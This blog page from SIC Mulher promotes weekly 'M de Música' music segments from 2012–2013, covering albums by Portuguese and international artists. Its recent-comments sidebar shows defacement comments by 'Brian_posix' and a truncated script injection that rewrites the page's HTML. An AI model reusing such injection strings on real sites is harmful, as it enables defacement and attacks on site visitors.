M de Música @ 18:30

Ter, 07/05/13

Que a música portuguesa está de boa saúde, já o dissemos várias vezes. E que se recomenda. E que encanta.

Encantadoras são, também, as mais recentes novidades a chegar aos escaparates nacionais, e no feminino! Da nostalgia jazzy de Luísa Sobral ao rock inquieto das Anarchicks, passando pela contemplação sublime de Márcia, todas vão marcar presença no próximo M de Música.

 

Porque há certezas que merecem ser partilhadas...

A não perder, no Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 




Tags:


M de Música @ 18:30

Ter, 23/04/13

Podíamos dizer que o M de Música desta quarta-feira segue os números ímpares, mas, verdadeiramente únicas, são as obras destes nomes. Começa-se pelo número 1, quando surgiu, James Blake foi considerado uma das maiores promessas da música britânica.


Agora, com Overgrown, vai mais longe, num disco sedutoramente encantador. Os Yeah Yeah Yeahs também estão de volta, estes 3 nova-iorquinos, liderados de forma poderosa por Karen O, apresentam Mosquito, um disco de sonhos e aliens, que faz sonhar e... dançar.


Mas em Portugal a música também está de boa saúde e recomenda-se, os 5 Orelha Negra uniram esforços com grandes figuras da música nacional e assinaram a sua Mixtape II, uma incrível viagem sonora por boa parte da história da música contemporânea.

 

Por isso, motivos não faltam para ver e acima de tudo ouvir, o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:


M de Música @ 18:30

Ter, 02/04/13

Esta semana, todas as conversas levam a grandes regressos.

Com mais de três décadas de carreira, em Delta Machine, os Depeche Mode provam por que razão continuam a assinar um electro-pop que deixa o mundo inteiro rendido.

Justin Timberlake que dá voz a um tremendo registo de puro r&b quando já toda a gente tinha desistido de encontrá-lo em disco.

E os Strokes não precisaram de mais cinco anos para voltarem à carga, Comedown Machine, no entanto, deixa dúvidas sobre o que se vai seguir na carreira do grupo de Nova Iorque.

Eis três grandes nomes e três álbuns verdadeiramente imperdíveis.
No Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


M de Música @ 18:30

Ter, 26/03/13

Em Sound City, o primeiro documentário assinado por Dave Grohl, fala-se da música enquanto instituição: dos momentos inspiradores que dão origem às grandes obras, dos artistas cuja genialidade os parece destacar da sua mera mortalidade, das canções que nascem de sonhos pessoais e se tornam hinos de gerações inteiras.

 

E é também de tudo isso que se fala no próximo M de Música: da irrequieta inconstância de Trent Reznor (que apresenta os seus How To Destroy Angels) e das observações sempre pertinentes da Deolinda (que mostra a Portugal como é o seu Mundo Pequenino).

 

Por isso não pode perder o próximo Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


M de Música @ 18:30

Ter, 12/03/13

No próximo M de Música, fazemos uma reunião de cavalheiros, ou melhor, do regresso de grandes cavalheiros. Por um lado, da Austrália, Nick Cave está de volta aos seus Bad Seeds e, em Push The Sky Away, apresenta uma coleção de melancolia e sedução como há muito não encontrávamos. Do outro lado do Atlântico, o britânico David Bowie confirma porque razão é considerado um dos mais ímpares artistas de todos os tempos: uma década de ausência depois, conseguiu preparar, ao longo de dois anos, um disco sobre o qual ninguém desconfiou.

De uma assentada, retorna ao ponto de partida, à invenção típica do grande camaleão. Também de regresso, mas desta vez aos palcos portugueses, estão os Mumford & Sons. Se, em Julho, estavam cheios de energia, na contagem decrescente para a edição de Babel, agora vêm com espírito imbatível, depois do Grammy para Álbum do Ano e do Brit para Melhor Banda. O público português não anda distraído: o concerto no Coliseu dos Recreios já está esgotado há muito tempo.

 

Por isso já sabe, se não quer perder nada das novidades musicais mais entusiasmantes do momento, não perca o Mais Mulher desta quarta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


M de Música @ 18:30

Ter, 19/02/13

Primeiro, conquistaram os topes com um punk orelhudo.

Depois, tornaram-se porta-vozes de uma sociedade americana em ebulição. Pelo caminho, venderam milhões e até tiveram direito a um musical na Broadway. Afinal, o que é que faltava na carreira dos Green Day?

A sua mais ambiciosa aventura até à data: editar uma trilogia! Diz-se que a indústria discográfica está em maus lençóis mas o trio da Califórnia não está preparado para baixar os braços.

Quem também continua a sua saga para o domínio global da pop é Robbie Williams que, no novo disco, não tem pudor em gritar a plenos pulmões que a coroa é... sua!

Com o nascimento dos Buraka Som Sistema, a definição de world-music ganhou um novo sentido: partem dos ritmos africanos e das toadas do submundo das grandes capitais globais mas, ao fazê-lo, deixam todas as pistas de dança aos seus pés. Agora, esta incrível jornada está disponível numa só caixa, que não só narra uma história de apaixonante sucesso como lança as coordenadas para o futuro.

De volta está o Talkfest - o fórum de discussão dos festivais em Portugal, que, em 2013, cresceu. Agora, tem direito a masterclasses, key-speakers internacionais e muita música.

Afinal de contas, é essa razão para tudo isto existir, verdade?

 

Por isso não perca estas e muitas outras novidades, no Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 




Tags:


M de Música @ 18:30

Ter, 29/01/13

Portugal pode estar mergulhado numa profunda crise económica mas a música portuguesa está de boa saúde.

 

Do indie à electrónica, da spoken word ao alternativo, entre a poesia e a magia, há discos que nos ficam cravados na memória.

Em 2012, David Fonseca deu voz a um diário musical, no duplo lançamento Seasons. Em Origins, Emmy Curl confirmou que é impossível não ficar rendido à sua toada de fada.


Carlos Nobre brincou, como só ele sabe fazer, com as palavras e ensinou A Gramática da Paixão Dramática.

E, com Acústico, Tiago Bettencourt começou a celebrar (de forma única) 10 anos de uma carreira (também ela) única. Que não restem dúvidas: a música portuguesa está de boa saúde - e recomenda-se!

 

Não perca nada destas novidades nacionais no Mais Mulher, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


M de Música @ 18:30

Ter, 15/01/13

O primeiro M de Música de 2013 fica, na sua totalidade, entregue às mulheres: da pop intempestiva de Christina Aguilera à soul apaixonante de Aurea, do fado avassalador de Ana Moura ao r&b contagiante de Alicia Keys.

 

Quatro mulheres, quatro géneros, a mesma voracidade: grandes vozes e uma tremenda originalidade.

Com os votos de um Feliz Ano Novo!

 

A não perder no mais Mulher desta quarta-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!


Tags:


M de Música @ 18:31

Sex, 21/12/12

Se a música faz sonhar e se o Natal é a época de todos os sonhos, o M de Música não podia deixar de celebrar esta época única!


Poucas horas antes de reunir a família à volta da árvore, oferecemos a banda-sonora perfeita para uma noite verdadeiramente mágica: falamos de White Christmas, de como Santa Claus Is Coming To Town e de como, para contrastar com o calor da família, o desejo é apenas um: Let It Snow! Let It Snow! Let It Snow!.


Desde sempre, o Natal cativou as maiores vozes e as mais incontornáveis figuras do mundo da música. E é por isso que, neste especial de Natal, nos deixamos embalar por Judy Garland, Bing Crosby, Rod Stewart ou Mariah Carey. Que é como quem diz, juntamo-nos aos maiores para um desejo muito singelo: Feliz Natal!

 

Não perca, no Mais Mulher, às 17:30.

 

Na SIC Mulher!

 

Veja o vídeo aqui!


Tags:


M de Música @ 18:30

Ter, 11/12/12

Falar de rock é, obrigatoriamente, falar de Rolling Stones. 50 anos parece muito tempo mas o vigor com que a banda britânica se continua a entregar a riffs desenfreados e o seu eterno espírito inquieto explica a longevidade da sua obra.


Em Julho de 1962, quem assistiu à estreia dos Rolling Stones, nunca poderia imaginar que, cinco décadas depois, a banda se tivesse tornado uma lenda, um nome incontornável da cultura de todos os tempos.


Para celebrar o 50º aniversário dos Rolling Stones, o M de Música faz a devida vénia e olha para este percurso inigualável: neste edição especial, reflete-se sobre a arte dos Stones com dois artigos imperdíveis no horizonte, GRRR!

 

No Mais Mulher desta quarta-feira na Sic Mulher!

 

Veja o vídeo aqui!


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO